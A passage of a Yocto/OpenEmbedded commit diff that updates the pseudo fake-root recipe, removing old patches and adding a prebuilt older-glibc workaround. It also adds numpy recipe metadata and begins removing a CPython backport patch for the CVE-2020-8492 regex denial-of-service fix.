- pseudo_ipc.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/pseudo_ipc.h b/pseudo_ipc.h
-index caeae5c..d945257 100644
---- a/pseudo_ipc.h
-+++ b/pseudo_ipc.h
-@@ -29,7 +29,7 @@ typedef struct {
- char path[];
- } pseudo_msg_t;
-
--enum {
-+typedef enum {
- PSA_EXEC = 1,
- PSA_WRITE = (PSA_EXEC << 1),
- PSA_READ = (PSA_WRITE << 1),
---
-2.26.2
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch b/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch
deleted file mode 100644
index 17829ef3ac..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 86c9a5610e3333ad6aaadb1ac1e8b5a2c948d119 Mon Sep 17 00:00:00 2001
-From: Robert Yang <liezhi.yang@windriver.com>
-Date: Mon, 25 Nov 2019 18:46:45 +0800
-Subject: [PATCH] realpath.c: Remove trailing slashes
-
-Linux system's realpath() remove trailing slashes, but pseudo's doesn't, need
-make them identical.
-
-E.g., the following code (rel.c) prints '/tmp' with system's realpath, but
-pseudo's realpath prints '/tmp/':
-
- #include <stdio.h>
- #include <limits.h>
- #include <stdlib.h>
-
- int main() {
- char out[PATH_MAX];
- printf("%s\n", realpath("/tmp/", out));
- return 0;
- }
-
-$ bitbake base-passwd -cdevshell # For pseudo env
-$ gcc rel.c
-$ ./a.out
-/tmp/ (but should be /tmp)
-
-This patch fixes the problem.
-
-Upstream-Status: Submitted [https://lists.yoctoproject.org/g/poky/message/11879]
-
-Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
----
- ports/unix/guts/realpath.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/ports/unix/guts/realpath.c b/ports/unix/guts/realpath.c
---- a/ports/unix/guts/realpath.c
-+++ b/ports/unix/guts/realpath.c
-@@ -14,7 +14,14 @@
- errno = ENAMETOOLONG;
- return NULL;
- }
-- if ((len = strlen(rname)) >= pseudo_sys_path_max()) {
-+ len = strlen(rname);
-+ char *ep = rname + len - 1;
-+ while (ep > rname && *ep == '/') {
-+ --len;
-+ *(ep--) = '\0';
-+ }
-+
-+ if (len >= pseudo_sys_path_max()) {
- errno = ENAMETOOLONG;
- return NULL;
- }
---
-2.7.4
-
diff --git a/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch b/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch
deleted file mode 100644
index 161357d553..0000000000
--- a/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 93d95ed2eaedcca110c214e1fe3f8896b1f6f853 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Tue, 17 Dec 2019 20:24:27 +0100
-Subject: [PATCH] xattr: adjust for attr 2.4.48 release
-
-Latest versions of attr have removed the xattr.h header,
-with the rationale that libc is providing the same wrappers.
-
-attr/attributes.h is providing the ENOATTR definition.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- ports/linux/subports | 5 +++--
- ports/linux/xattr/portdefs.h | 3 ++-
- 2 files changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/ports/linux/subports b/ports/linux/subports
-index 2c43ac9..740ec83 100755
---- a/ports/linux/subports
-+++ b/ports/linux/subports
-@@ -29,11 +29,12 @@ fi
- if $port_xattr; then
- cat > dummy.c <<EOF
- #include <sys/types.h>
--#include <attr/xattr.h>
-+#include <sys/xattr.h>
-+#include <attr/attributes.h>
- int i;
- EOF
- if ! ${CC} -c -o dummy.o dummy.c >/dev/null 2>&1; then
-- echo >&2 "Warning: Can't compile trivial program using <attr/xattr.h>".
-+ echo >&2 "Warning: Can't compile trivial program using <attr/attributes.h>".
- echo >&2 " xattr support will require that header."
- fi
- echo "linux/xattr"
-diff --git a/ports/linux/xattr/portdefs.h b/ports/linux/xattr/portdefs.h
-index 56cd3ca..068d39a 100644
---- a/ports/linux/xattr/portdefs.h
-+++ b/ports/linux/xattr/portdefs.h
-@@ -2,5 +2,6 @@
- * SPDX-License-Identifier: LGPL-2.1-only
- *
- */
--#include <attr/xattr.h>
-+#include <sys/xattr.h>
-+#include <attr/attributes.h>
- #include <stdint.h>
diff --git a/meta/recipes-devtools/pseudo/files/build-oldlibc b/meta/recipes-devtools/pseudo/files/build-oldlibc
new file mode 100755
index 0000000000..85c438de4e
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/build-oldlibc
@@ -0,0 +1,20 @@
+#!/bin/sh
+#
+# Script to re-generate pseudo-prebuilt-2.33.tar.xz
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+for i in x86_64 aarch64 i686; do
+ if [ ! -e $i-nativesdk-libc.tar.xz ]; then
+ wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz
+ fi
+ tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\*
+ cd $i-linux/lib
+ ln -s libdl.so.2 libdl.so
+ ln -s libpthread.so.0 libpthread.so
+ cd ../..
+done
+tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux \ No newline at end of file
diff --git a/meta/recipes-devtools/pseudo/files/moreretries.patch b/meta/recipes-devtools/pseudo/files/moreretries.patch
deleted file mode 100644
index adea2665b0..0000000000
--- a/meta/recipes-devtools/pseudo/files/moreretries.patch
+++ /dev/null
@@ -1,19 +0,0 @@
-Increase the number of retries in pseudo due to occasional slow
-server shutdowns.
-
-Upstream-Status: Pending
-RP 2016/2/28
-
-Index: git/pseudo_client.c
-===================================================================
---- git.orig/pseudo_client.c
-+++ git/pseudo_client.c
-@@ -1282,7 +1282,7 @@ pseudo_client_setup(void) {
- }
- }
-
--#define PSEUDO_RETRIES 20
-+#define PSEUDO_RETRIES 250
- static pseudo_msg_t *
- pseudo_client_request(pseudo_msg_t *msg, size_t len, const char *path) {
- pseudo_msg_t *response = 0;
diff --git a/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
new file mode 100644
index 0000000000..c453b5f735
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
@@ -0,0 +1,57 @@
+If we link against a newer glibc 2.34 and then try and our LD_PRELOAD is run against a
+binary on a host with an older libc, we see symbol errors since in glibc 2.34, pthread
+and dl are merged into libc itself.
+
+We need to use the older form of linking so use glibc binaries from an older release
+to force this. We only use minimal symbols from these anyway.
+
+pthread_atfork is problematic, particularly on arm so use the internal glibc routine
+it maps too. This was always present in the main libc from 2.3.2 onwards.
+
+Yes this is horrible. Better solutions welcome.
+
+There is more info in the bug: [YOCTO #14521]
+
+Upstream-Status: Inappropriate [this patch is native and nativesdk]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Tweak library search order, make prebuilt lib ahead of recipe lib
+Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+---
+ Makefile.in | 2 +-
+ pseudo_wrappers.c | 5 ++++-
+ 2 files changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile.in b/Makefile.in
+--- a/Makefile.in
++++ b/Makefile.in
+@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN)
+ libpseudo: $(LIBPSEUDO)
+
+ $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB)
+- $(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
++ $(CC) $(CFLAGS) -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
+ pseudo_client.o pseudo_ipc.o \
+ $(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS)
+
+diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c
+--- a/pseudo_wrappers.c
++++ b/pseudo_wrappers.c
+@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void)
+ pseudo_mutex_holder = 0;
+ }
+
++extern void *__dso_handle;
++extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *);
++
+ static void
+ _libpseudo_init(void) {
+ if (!_libpseudo_initted)
+- pthread_atfork(NULL, NULL, libpseudo_atfork_child);
++ __register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle);
+
+ pseudo_getlock();
+ pseudo_antimagic();
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/pseudo/files/seccomp.patch b/meta/recipes-devtools/pseudo/files/seccomp.patch
deleted file mode 100644
index 283f997941..0000000000
--- a/meta/recipes-devtools/pseudo/files/seccomp.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-Pseudo changes the syscall access patterns which makes it incompatible with
-seccomp. Therefore intercept the seccomp syscall and alter it, pretending that
-seccomp was setup when in fact we do nothing. If we error as unsupported,
-utilities like file will exit with errors so we can't just disable it.
-
-Upstream-Status: Pending
-RP 2020/4/3
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-
-It fails to compile pseudo-native on centos 7:
-
-| ports/linux/pseudo_wrappers.c: In function ‘prctl’:
-| ports/linux/pseudo_wrappers.c:129:14: error: ‘SECCOMP_SET_MODE_FILTER’ undeclared (first use in this function)
-| if (cmd == SECCOMP_SET_MODE_FILTER) {
-| ^
-
-Add macro guard for seccomp to avoid the failure.
-
-Signed-off-by: Kai Kang <kai.kang@windriver.com>
-
-Index: git/ports/linux/pseudo_wrappers.c
-===================================================================
---- git.orig/ports/linux/pseudo_wrappers.c
-+++ git/ports/linux/pseudo_wrappers.c
-@@ -57,6 +57,7 @@ int pseudo_capset(cap_user_header_t hdrp
- long
- syscall(long number, ...) {
- long rc = -1;
-+ va_list ap;
-
- if (!pseudo_check_wrappers() || !real_syscall) {
- /* rc was initialized to the "failure" value */
-@@ -77,6 +78,20 @@ syscall(long number, ...) {
- (void) number;
- #endif
-
-+#ifdef SYS_seccomp
-+ /* pseudo and seccomp are incompatible as pseudo uses different syscalls
-+ * so pretend to enable seccomp but really do nothing */
-+ if (number == SYS_seccomp) {
-+ unsigned long cmd;
-+ va_start(ap, number);
-+ cmd = va_arg(ap, unsigned long);
-+ va_end(ap);
-+ if (cmd == SECCOMP_SET_MODE_FILTER) {
-+ return 0;
-+ }
-+ }
-+#endif
-+
- /* gcc magic to attempt to just pass these args to syscall. we have to
- * guess about the number of args; the docs discuss calling conventions
- * up to 7, so let's try that?
-@@ -92,3 +108,44 @@ static long wrap_syscall(long nr, va_lis
- (void) ap;
- return -1;
- }
-+
-+int
-+prctl(int option, ...) {
-+ int rc = -1;
-+ va_list ap;
-+
-+ if (!pseudo_check_wrappers() || !real_prctl) {
-+ /* rc was initialized to the "failure" value */
-+ pseudo_enosys("prctl");
-+ return rc;
-+ }
-+
-+#ifdef SECCOMP_SET_MODE_FILTER
-+ /* pseudo and seccomp are incompatible as pseudo uses different syscalls
-+ * so pretend to enable seccomp but really do nothing */
-+ if (option == PR_SET_SECCOMP) {
-+ unsigned long cmd;
-+ va_start(ap, option);
-+ cmd = va_arg(ap, unsigned long);
-+ va_end(ap);
-+ if (cmd == SECCOMP_SET_MODE_FILTER) {
-+ return 0;
-+ }
-+ }
-+#endif
-+
-+ /* gcc magic to attempt to just pass these args to prctl. we have to
-+ * guess about the number of args; the docs discuss calling conventions
-+ * up to 5, so let's try that?
-+ */
-+ void *res = __builtin_apply((void (*)()) real_prctl, __builtin_apply_args(), sizeof(long) * 5);
-+ __builtin_return(res);
-+}
-+
-+/* unused.
-+ */
-+static int wrap_prctl(int option, va_list ap) {
-+ (void) option;
-+ (void) ap;
-+ return -1;
-+}
-Index: git/ports/linux/guts/prctl.c
-===================================================================
---- /dev/null
-+++ git/ports/linux/guts/prctl.c
-@@ -0,0 +1,15 @@
-+/*
-+ * Copyright (c) 2020 Richard Purdie
-+ *
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ * int prctl(int option, ...)
-+ * int rc = -1;
-+ */
-+
-+ /* we should never get here, prctl is hand-wrapped */
-+ rc = -1;
-+
-+/* return rc;
-+ * }
-+ */
-Index: git/ports/linux/portdefs.h
-===================================================================
---- git.orig/ports/linux/portdefs.h
-+++ git/ports/linux/portdefs.h
-@@ -32,3 +32,5 @@ GLIBC_COMPAT_SYMBOL(memcpy,2.0);
-
- #include <linux/capability.h>
- #include <sys/syscall.h>
-+#include <sys/prctl.h>
-+#include <linux/seccomp.h>
-Index: git/ports/linux/wrapfuncs.in
-===================================================================
---- git.orig/ports/linux/wrapfuncs.in
-+++ git/ports/linux/wrapfuncs.in
-@@ -56,3 +56,4 @@ int getgrent_r(struct group *gbuf, char
- int capset(cap_user_header_t hdrp, const cap_user_data_t datap); /* real_func=pseudo_capset */
- long syscall(long nr, ...); /* hand_wrapped=1 */
- int renameat2(int olddirfd, const char *oldpath, int newdirfd, const char *newpath, unsigned int flags); /* flags=AT_SYMLINK_NOFOLLOW */
-+int prctl(int option, ...); /* hand_wrapped=1 */
diff --git a/meta/recipes-devtools/pseudo/files/toomanyfiles.patch b/meta/recipes-devtools/pseudo/files/toomanyfiles.patch
deleted file mode 100644
index bda7e4b202..0000000000
--- a/meta/recipes-devtools/pseudo/files/toomanyfiles.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From b0b25fbc041a148d1de09f5a6503cd95973ec77c Mon Sep 17 00:00:00 2001
-From: Richard Purdie <richard.purdie@linuxfoundation.org>
-Date: Tue, 25 Apr 2017 15:25:54 +0100
-Subject: [PATCH 3/3] pseudo: Handle too many files deadlock
-
-Currently if we max out the maximum number of files, pseudo can deadlock, unable to
-accept new connections yet unable to move forward and unblock the other processes
-waiting either.
-
-Rather than hang, when this happens, close out inactive connections, allowing us
-to accept the new ones. The disconnected clients will simply reconnect. There is
-a small risk of data loss here sadly but its better than hanging.
-
-RP
-2017/4/25
-
-Upstream-Status: Submitted [Peter is aware of the issue]
-
----
- pseudo_server.c | 10 ++++++++++
- 1 file changed, 10 insertions(+)
-
-diff --git a/pseudo_server.c b/pseudo_server.c
-index dac3258..15a3e8f 100644
---- a/pseudo_server.c
-+++ b/pseudo_server.c
-@@ -802,6 +802,7 @@ pseudo_server_loop(void) {
- struct sigaction eat_usr2 = {
- .sa_handler = set_do_list_clients
- };
-+ int hitmaxfiles;
-
- clients = malloc(16 * sizeof(*clients));
-
-@@ -820,6 +821,7 @@ pseudo_server_loop(void) {
- active_clients = 1;
- max_clients = 16;
- highest_client = 0;
-+ hitmaxfiles = 0;
-
- pseudo_debug(PDBGF_SERVER, "server loop started.\n");
- if (listen_fd < 0) {
-@@ -878,10 +880,15 @@ pseudo_server_loop(void) {
- } else {
- serve_client(i);
- }
-+ } else if (hitmaxfiles) {
-+ /* Only close one per loop iteration in the interests of caution */
-+ close_client(i);
-+ hitmaxfiles = 0;
- }
- if (die_forcefully)
- break;
- }
-+ hitmaxfiles = 0;
- if (!die_forcefully &&
- (FD_ISSET(clients[0].fd, &events) ||
- FD_ISSET(clients[0].fd, &reads))) {
-@@ -903,6 +910,9 @@ pseudo_server_loop(void) {
- */
- pseudo_server_timeout = DEFAULT_PSEUDO_SERVER_TIMEOUT;
- die_peacefully = 0;
-+ } else if (errno == EMFILE) {
-+ hitmaxfiles = 1;
-+ pseudo_debug(PDBGF_SERVER, "Hit max open files, dropping a client.\n");
- }
- }
- pseudo_debug(PDBGF_SERVER, "server loop complete [%d clients left]\n", active_clients);
---
-2.15.1
-
diff --git a/meta/recipes-devtools/pseudo/files/xattr_version.patch b/meta/recipes-devtools/pseudo/files/xattr_version.patch
deleted file mode 100644
index a8b14bdd69..0000000000
--- a/meta/recipes-devtools/pseudo/files/xattr_version.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-On a tumbleweed system, "install X Y" was showing the error:
-
-pseudo: ENOSYS for 'fsetxattr'.
-
-which was being caused by dlsym() for that function returning NULL. This
-appears to be due to it finding an unresolved symbol in libacl for this
-symbol in libattr. It hasn't been resolved so its NULL. dlerror() returns
-nothing since this is a valid symbol entry, its just not the one we want.
-
-We can add the glibc version string for the symbol we actually want so we get
-that version rather than the libattr/libacl one.
-
-To quote libattr:
-"""
- These dumb wrappers are for backwards compatibility only.
- Actual syscall wrappers are long gone to libc.
-"""
-and they are simply wrappers around the libc version so our attaching
-to the libc versions should intercept any accesses via these too.
-
-RP 2020/06/22
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org
-Upstream-Status: Pending [discussed with seebs on irc and appears the correct fix]
-
-
-Index: git/ports/linux/xattr/wrapfuncs.in
-===================================================================
---- git.orig/ports/linux/xattr/wrapfuncs.in
-+++ git/ports/linux/xattr/wrapfuncs.in
-@@ -1,12 +1,12 @@
--ssize_t getxattr(const char *path, const char *name, void *value, size_t size); /* flags=0 */
--ssize_t lgetxattr(const char *path, const char *name, void *value, size_t size); /* flags=AT_SYMLINK_NOFOLLOW */
--ssize_t fgetxattr(int filedes, const char *name, void *value, size_t size);
--int setxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=0 */
--int lsetxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=AT_SYMLINK_NOFOLLOW */
--int fsetxattr(int filedes, const char *name, const void *value, size_t size, int xflags);
--ssize_t listxattr(const char *path, char *list, size_t size); /* flags=0 */
--ssize_t llistxattr(const char *path, char *list, size_t size); /* flags=AT_SYMLINK_NOFOLLOW */
--ssize_t flistxattr(int filedes, char *list, size_t size);
--int removexattr(const char *path, const char *name); /* flags=0 */
--int lremovexattr(const char *path, const char *name); /* flags=AT_SYMLINK_NOFOLLOW */
--int fremovexattr(int filedes, const char *name);
-+ssize_t getxattr(const char *path, const char *name, void *value, size_t size); /* flags=0, version="GLIBC_2.3" */
-+ssize_t lgetxattr(const char *path, const char *name, void *value, size_t size); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+ssize_t fgetxattr(int filedes, const char *name, void *value, size_t size); /* version="GLIBC_2.3" */
-+int setxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=0, version="GLIBC_2.3" */
-+int lsetxattr(const char *path, const char *name, const void *value, size_t size, int xflags); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+int fsetxattr(int filedes, const char *name, const void *value, size_t size, int xflags); /* version="GLIBC_2.3" */
-+ssize_t listxattr(const char *path, char *list, size_t size); /* flags=0, version="GLIBC_2.3" */
-+ssize_t llistxattr(const char *path, char *list, size_t size); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+ssize_t flistxattr(int filedes, char *list, size_t size); /* version="GLIBC_2.3" */
-+int removexattr(const char *path, const char *name); /* flags=0, version="GLIBC_2.3" */
-+int lremovexattr(const char *path, const char *name); /* flags=AT_SYMLINK_NOFOLLOW, version="GLIBC_2.3" */
-+int fremovexattr(int filedes, const char *name); /* version="GLIBC_2.3" */
diff --git a/meta/recipes-devtools/pseudo/pseudo.inc b/meta/recipes-devtools/pseudo/pseudo.inc
index 50e30064bd..e6512bc6e6 100644
--- a/meta/recipes-devtools/pseudo/pseudo.inc
+++ b/meta/recipes-devtools/pseudo/pseudo.inc
@@ -4,6 +4,7 @@
SUMMARY = "Pseudo gives fake root capabilities to a normal user"
HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/pseudo"
+DESCRIPTION = "The pseudo utility offers a way to run commands in a virtualized root environment."
LIC_FILES_CHKSUM = "file://COPYING;md5=a1d8023a6f953ac6ea4af765ff62d574"
SECTION = "base"
LICENSE = "LGPL2.1"
@@ -111,6 +112,19 @@ do_compile_prepend_class-nativesdk () {
fi
}
+do_compile_append_class-native () {
+ if [ '${@bb.data.inherits_class('uninative', d)}' = 'True' ]; then
+ for i in PSEUDO_PORT_UNIX_SYNCFS PSEUDO_PORT_UIDS_GENERIC PSEUDO_PORT_LINUX_NEWCLONE PSEUDO_PORT_LINUX_XATTR PSEUDO_PORT_LINUX_STATVFS; do
+ grep $i.1 ${S}/pseudo_ports.h
+ if [ $? != 0 ]; then
+ echo "$i not enabled in pseudo which is incompatible with uninative"
+ exit 1
+ fi
+ done
+ fi
+}
+
+
do_install () {
oe_runmake 'DESTDIR=${D}' ${MAKEOPTS} 'LIB=lib/pseudo/lib$(MARK64)' install
}
diff --git a/meta/recipes-devtools/pseudo/pseudo_git.bb b/meta/recipes-devtools/pseudo/pseudo_git.bb
index 419bac19fe..b5da3f0e29 100644
--- a/meta/recipes-devtools/pseudo/pseudo_git.bb
+++ b/meta/recipes-devtools/pseudo/pseudo_git.bb
@@ -1,22 +1,19 @@
require pseudo.inc
-SRC_URI = "git://git.yoctoproject.org/pseudo \
+SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \
file://0001-configure-Prune-PIE-flags.patch \
file://fallback-passwd \
file://fallback-group \
- file://moreretries.patch \
- file://toomanyfiles.patch \
- file://0001-maketables-wrappers-use-Python-3.patch \
- file://0001-Add-statx.patch \
- file://0001-realpath.c-Remove-trailing-slashes.patch \
- file://0006-xattr-adjust-for-attr-2.4.48-release.patch \
- file://seccomp.patch \
- file://0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch \
- file://0001-pseudo_ipc.h-Fix-enum-typedef.patch \
- file://xattr_version.patch \
"
+SRC_URI:append:class-native = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI:append:class-nativesdk = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa"
-SRCREV = "060058bb29f70b244e685b3c704eb0641b736f73"
+SRCREV = "2b4b88eb513335b0ece55fe51854693d9b20de35"
S = "${WORKDIR}/git"
PV = "1.9.0+git${SRCPV}"
diff --git a/meta/recipes-devtools/python-numpy/python-numpy.inc b/meta/recipes-devtools/python-numpy/python-numpy.inc
index 42032a04a8..4cc506474b 100644
--- a/meta/recipes-devtools/python-numpy/python-numpy.inc
+++ b/meta/recipes-devtools/python-numpy/python-numpy.inc
@@ -1,4 +1,6 @@
SUMMARY = "A sophisticated Numeric Processing Package for Python"
+HOMEPAGE = "https://numpy.org/"
+DESCRIPTION = "NumPy is the fundamental package needed for scientific computing with Python."
SECTION = "devel/python"
LICENSE = "BSD-3-Clause & BSD-2-Clause & PSF & Apache-2.0 & BSD & MIT"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=1a32aba007a415aa8a1c708a0e2b86a1"
diff --git a/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch b/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
deleted file mode 100644
index e16b99bcb9..0000000000
--- a/meta/recipes-devtools/python/files/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
+++ /dev/null
@@ -1,248 +0,0 @@
-From 0b297d4ff1c0e4480ad33acae793fbaf4bf015b4 Mon Sep 17 00:00:00 2001
-From: Victor Stinner <vstinner@python.org>
-Date: Thu, 2 Apr 2020 02:52:20 +0200
-Subject: [PATCH] bpo-39503: CVE-2020-8492: Fix AbstractBasicAuthHandler
- (GH-18284)
-
-Upstream-Status: Backport
-(https://github.com/python/cpython/commit/0b297d4ff1c0e4480ad33acae793fbaf4bf015b4)
-
-CVE: CVE-2020-8492
-
-The AbstractBasicAuthHandler class of the urllib.request module uses
-an inefficient regular expression which can be exploited by an
-attacker to cause a denial of service. Fix the regex to prevent the
-catastrophic backtracking. Vulnerability reported by Ben Caller
-and Matt Schwager.
-
-AbstractBasicAuthHandler of urllib.request now parses all
-WWW-Authenticate HTTP headers and accepts multiple challenges per
-header: use the realm of the first Basic challenge.
-
-Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
-Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
----
- Lib/test/test_urllib2.py | 90 ++++++++++++-------
- Lib/urllib/request.py | 69 ++++++++++----
- .../2020-03-25-16-02-16.bpo-39503.YmMbYn.rst | 3 +
- .../2020-01-30-16-15-29.bpo-39503.B299Yq.rst | 5 ++
- 4 files changed, 115 insertions(+), 52 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
- create mode 100644 Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
-
-diff --git a/Lib/test/test_urllib2.py b/Lib/test/test_urllib2.py
-index 8abedaac98..e69ac3e213 100644
---- a/Lib/test/test_urllib2.py
-+++ b/Lib/test/test_urllib2.py
-@@ -1446,40 +1446,64 @@ class HandlerTests(unittest.TestCase):
- bypass = {'exclude_simple': True, 'exceptions': []}
- self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))
-
-- def test_basic_auth(self, quote_char='"'):
-- opener = OpenerDirector()
-- password_manager = MockPasswordManager()
-- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-- realm = "ACME Widget Store"
-- http_handler = MockHTTPHandler(
-- 401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
-- (quote_char, realm, quote_char))
-- opener.add_handler(auth_handler)
-- opener.add_handler(http_handler)
-- self._test_basic_auth(opener, auth_handler, "Authorization",
-- realm, http_handler, password_manager,
-- "http://acme.example.com/protected",
-- "http://acme.example.com/protected",
-- )
--
-- def test_basic_auth_with_single_quoted_realm(self):
-- self.test_basic_auth(quote_char="'")
--
-- def test_basic_auth_with_unquoted_realm(self):
-- opener = OpenerDirector()
-- password_manager = MockPasswordManager()
-- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-- realm = "ACME Widget Store"
-- http_handler = MockHTTPHandler(
-- 401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
-- opener.add_handler(auth_handler)
-- opener.add_handler(http_handler)
-- with self.assertWarns(UserWarning):
-+ def check_basic_auth(self, headers, realm):
-+ with self.subTest(realm=realm, headers=headers):
-+ opener = OpenerDirector()
-+ password_manager = MockPasswordManager()
-+ auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
-+ body = '\r\n'.join(headers) + '\r\n\r\n'
-+ http_handler = MockHTTPHandler(401, body)
-+ opener.add_handler(auth_handler)
-+ opener.add_handler(http_handler)
- self._test_basic_auth(opener, auth_handler, "Authorization",
-- realm, http_handler, password_manager,
-- "http://acme.example.com/protected",
-- "http://acme.example.com/protected",
-- )
-+ realm, http_handler, password_manager,
-+ "http://acme.example.com/protected",
-+ "http://acme.example.com/protected")
-+
-+ def test_basic_auth(self):
-+ realm = "realm2@example.com"
-+ realm2 = "realm2@example.com"
-+ basic = f'Basic realm="{realm}"'
-+ basic2 = f'Basic realm="{realm2}"'
-+ other_no_realm = 'Otherscheme xxx'
-+ digest = (f'Digest realm="{realm2}", '
-+ f'qop="auth, auth-int", '
-+ f'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
-+ f'opaque="5ccc069c403ebaf9f0171e9517f40e41"')
-+ for realm_str in (
-+ # test "quote" and 'quote'
-+ f'Basic realm="{realm}"',
-+ f"Basic realm='{realm}'",
-+
-+ # charset is ignored
-+ f'Basic realm="{realm}", charset="UTF-8"',
-+
-+ # Multiple challenges per header
-+ f'{basic}, {basic2}',
-+ f'{basic}, {other_no_realm}',
-+ f'{other_no_realm}, {basic}',
-+ f'{basic}, {digest}',
-+ f'{digest}, {basic}',
-+ ):
-+ headers = [f'WWW-Authenticate: {realm_str}']
-+ self.check_basic_auth(headers, realm)
-+
-+ # no quote: expect a warning
-+ with support.check_warnings(("Basic Auth Realm was unquoted",
-+ UserWarning)):
-+ headers = [f'WWW-Authenticate: Basic realm={realm}']
-+ self.check_basic_auth(headers, realm)
-+
-+ # Multiple headers: one challenge per header.
-+ # Use the first Basic realm.
-+ for challenges in (
-+ [basic, basic2],
-+ [basic, digest],
-+ [digest, basic],
-+ ):
-+ headers = [f'WWW-Authenticate: {challenge}'
-+ for challenge in challenges]
-+ self.check_basic_auth(headers, realm)
-
- def test_proxy_basic_auth(self):
- opener = OpenerDirector()
-diff --git a/Lib/urllib/request.py b/Lib/urllib/request.py
-index 7fe50535da..2a3d71554f 100644
---- a/Lib/urllib/request.py
-+++ b/Lib/urllib/request.py
-@@ -937,8 +937,15 @@ class AbstractBasicAuthHandler:
-
- # allow for double- and single-quoted realm values
- # (single quotes are a violation of the RFC, but appear in the wild)
-- rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
-- 'realm=(["\']?)([^"\']*)\\2', re.I)
-+ rx = re.compile('(?:^|,)' # start of the string or ','
-+ '[ \t]*' # optional whitespaces
-+ '([^ \t]+)' # scheme like "Basic"
-+ '[ \t]+' # mandatory whitespaces
-+ # realm=xxx
-+ # realm='xxx'
-+ # realm="xxx"
-+ 'realm=(["\']?)([^"\']*)\\2',
-+ re.I)
-
- # XXX could pre-emptively send auth info already accepted (RFC 2617,
